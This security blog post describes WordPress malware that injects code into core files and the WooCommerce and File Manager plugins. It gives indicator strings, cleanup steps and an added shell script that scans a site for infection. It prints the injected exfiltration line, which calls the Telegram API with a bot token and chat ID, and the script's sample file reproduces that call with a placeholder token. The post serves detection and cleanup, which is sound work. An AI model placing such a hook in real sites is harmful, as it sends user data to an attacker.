WordPress malware using the Telegram API


“WordPress malware using the Telegram API”
“Panos Kesisis · 1st September 2020 · WordPress, PHP, Website Security”

Conspiracy Revelation: 28.9.2020: I removed the Telegram APIs manually from all infected files…

“wp_ajax_try_2020_v2”
“file_get_contents("https://api.telegram.org/xxxxxxxx:AAE1-wpQyYquqvB7wOeBzzmPafEp0d81e6c/sendMessage?chat_id=1110165405&text=" . urlencode$”

“The malware looks to be infecting WordPress’ core files and the “File Manager” and “WooCommerce” plugins for now, including the latest version of WordPress (5.5) and WooCommerce (4.4.1). The files that seem to be affected are:

wp-includes/user.php
wp-admin/admin-ajax.php
wp-file-manager/lib/files/HhGFXU.php (and other randomly named .php files)
woocommerce/includes/wc-user-functions.php
woocommerce/includes/class-wc-form-handler.php

Expressions that can help to determine if your site is compromised are:

“bajatax”
“api.telegram.org”

Since the code above is not hashed or obfuscated, it is extremely difficult to scan for with a security plugin like Wordfence or Sucuri, so manual intervention is advised.
Steps to resolve
The basic steps to resolve this are to replace all the WordPress core files with clean wp-admin and wp-includes folders and to do a fresh re-install of the WooCommerce and WP File Manager plugins. Always make sure to take a backup before attempting this.

Also, in no case should there be any references to those strings anywhere in your website’s files or database (with the exception of the 2nd string when using the official Telegram plugin).

Lastly, it is recommended to check for newly created WordPress user accounts that might have been injected into the database as well.
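The three checks the article describes (search the site tree for the two indicator strings, look for stray PHP files in the File Manager plugin's lib/files/ directory, and review recently registered users) as one offline-runnable script. This is an added example and not code from fixed.net, from the blog, or from WordPress; the Telegram plugin directory name, the sample site tree, the stand-in infected file and the user export are constructed assumptions, and the real indicators are only the two strings quoted above.

```shell
#!/bin/sh
# Added example (not code from fixed.net or from the blog): an offline indicator scan
# for the three checks the page describes. Assumes a POSIX sh with grep, find and awk,
# and that the site root has the usual wp-admin/, wp-includes/ and wp-content/ layout.

# The two indicator strings named on the page.
WP_IOC_STRINGS='bajatax
api.telegram.org'

# Path of the official Telegram plugin, whose files legitimately contain api.telegram.org.
# The plugin directory name is an assumption; set it to the slug actually installed.
WP_TELEGRAM_PLUGIN_DIR='wp-content/plugins/wp-telegram'

# scan_wp_indicators SITE_ROOT
# Prints "INDICATOR<TAB>RELATIVE_FILE" for every text file under SITE_ROOT that contains
# an indicator. Hits for api.telegram.org inside the official Telegram plugin are skipped;
# "bajatax" is reported everywhere, since nothing legitimate should contain it.
scan_wp_indicators() {
    root=$1
    printf '%s\n' "$WP_IOC_STRINGS" | while IFS= read -r ioc; do
        # -r recurse, -I skip binaries, -l list file names, -F treat the indicator literally
        grep -rIlF -- "$ioc" "$root" 2>/dev/null | while IFS= read -r f; do
            rel=${f#"$root"/}
            case "$ioc/$rel" in
                "api.telegram.org/$WP_TELEGRAM_PLUGIN_DIR"/*) continue ;;
            esac
            printf '%s\t%s\n' "$ioc" "$rel"
        done
    done
}

# find_filemanager_php SITE_ROOT
# The page lists randomly named .php files under wp-file-manager/lib/files/. That directory
# is the plugin's upload area rather than its own code (an assumption to verify against the
# installed plugin version), so every .php file found there is reported for inspection.
find_filemanager_php() {
    root=$1
    d="$root/wp-content/plugins/wp-file-manager/lib/files"
    [ -d "$d" ] || return 0
    find "$d" -type f -name '*.php' | while IFS= read -r f; do
        printf 'php-in-upload-dir\t%s\n' "${f#"$root"/}"
    done
}

# recent_users CSV_FILE CUTOFF
# CSV_FILE is an export in the shape produced by
#   wp user list --fields=ID,user_login,user_email,user_registered --format=csv
# Prints the login of every account registered at or after CUTOFF ("YYYY-MM-DD HH:MM:SS",
# which sorts correctly as plain text), i.e. the accounts to review after the infection date.
recent_users() {
    awk -F, -v cutoff="$2" 'NR > 1 && $4 >= cutoff { print $2 }' "$1"
}

# make_sample_tree
# Builds a constructed, minimal WordPress-like tree in a temp dir so the scan can be tried
# offline, and prints the temp dir. The contents are illustrative stand-ins, not real malware.
make_sample_tree() {
    tmp=$(mktemp -d)
    site=$tmp/site
    mkdir -p "$site/wp-admin" "$site/wp-includes" \
             "$site/wp-content/plugins/wp-file-manager/lib/files" \
             "$site/wp-content/plugins/woocommerce/includes" \
             "$site/$WP_TELEGRAM_PLUGIN_DIR"
    # Stand-in for an injected admin-ajax.php: carries both indicator strings, no real token.
    cat > "$site/wp-admin/admin-ajax.php" <<'EOF'
<?php
add_action('wp_ajax_try_2020_v2', 'bajatax_handler');
function bajatax_handler() { file_get_contents('https://api.telegram.org/botTOKEN/sendMessage?chat_id=0&text=' . urlencode('')); }
EOF
    printf '<?php // clean core file\n' > "$site/wp-includes/user.php"
    printf '<?php // clean plugin file\n' > "$site/wp-content/plugins/woocommerce/includes/wc-user-functions.php"
    # Legitimate reference inside the official Telegram plugin: must not be reported.
    printf '<?php $api = "https://api.telegram.org/bot";\n' > "$site/$WP_TELEGRAM_PLUGIN_DIR/telegram.php"
    # Constructed randomly named PHP file in the File Manager upload area.
    printf '<?php // constructed stand-in\n' > "$site/wp-content/plugins/wp-file-manager/lib/files/AbCdEf.php"
    # Constructed user export: one long-standing admin, one account created during the infection.
    cat > "$tmp/users.csv" <<'EOF'
ID,user_login,user_email,user_registered
1,admin,admin@example.com,2019-03-12 08:15:00
7,wp-support,support@example.net,2020-09-01 03:44:10
EOF
    printf '%s\n' "$tmp"
}

# Usage on a real site:
#   scan_wp_indicators /var/www/html; find_filemanager_php /var/www/html
#   wp user list --fields=ID,user_login,user_email,user_registered --format=csv > users.csv
#   recent_users users.csv '2020-08-01 00:00:00'
```

The scan reports the literal strings only, which is enough for this family because, as the article notes, the injected code is not obfuscated; it deliberately does not try to delete anything, since the article's remediation is to replace wp-admin, wp-includes and the two plugins wholesale from clean copies after taking a backup.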

Source: https://fixed.net/blog/wordpress-malware-using-the-telegram-api
